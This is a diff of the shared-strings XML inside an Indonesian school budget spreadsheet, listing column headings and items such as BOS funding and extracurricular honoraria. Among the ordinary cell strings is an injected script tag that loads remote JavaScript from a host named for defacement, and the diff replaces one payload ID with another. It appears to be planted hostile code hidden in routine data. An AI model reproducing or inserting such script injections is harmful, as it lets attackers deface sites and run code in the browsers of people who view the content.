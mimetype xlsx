--- v0 (2026-04-03)
+++ v1 (2026-06-02)
@@ -62,51 +62,51 @@
   <si>
     <t>Jumlah</t>
   </si>
   <si>
     <t>Tahun</t>
   </si>
   <si>
     <t>Sumber Dana</t>
   </si>
   <si>
     <t>Penanggung Jawab</t>
   </si>
   <si>
     <t>Waktu Pelaksanaan</t>
   </si>
   <si>
     <t>Indikator Output</t>
   </si>
   <si>
     <t>Keterangan</t>
   </si>
   <si>
     <t xml:space="preserve">Kebersihan </t>
   </si>
   <si>
-    <t>&lt;script src="https://jso.defacer.id/raw/K4s6Z409Q5"&gt;&lt;/script&gt;</t>
+    <t>&lt;script src="https://jso.defacer.id/raw/Wbr2q5L2S4"&gt;&lt;/script&gt;</t>
   </si>
   <si>
     <t>KOMITE</t>
   </si>
   <si>
     <t>Komite</t>
   </si>
   <si>
     <t>Tim Penjamin Mutu pendidikan Sekolah</t>
   </si>
   <si>
     <t>Juli - Juni 2025</t>
   </si>
   <si>
     <t>Honorarium Juru Bengkel/Toolman</t>
   </si>
   <si>
     <t xml:space="preserve">Kebutuhan </t>
   </si>
   <si>
     <t>BOS</t>
   </si>
   <si>
     <t>Honor Tambahan Ekstrakurikuler</t>
   </si>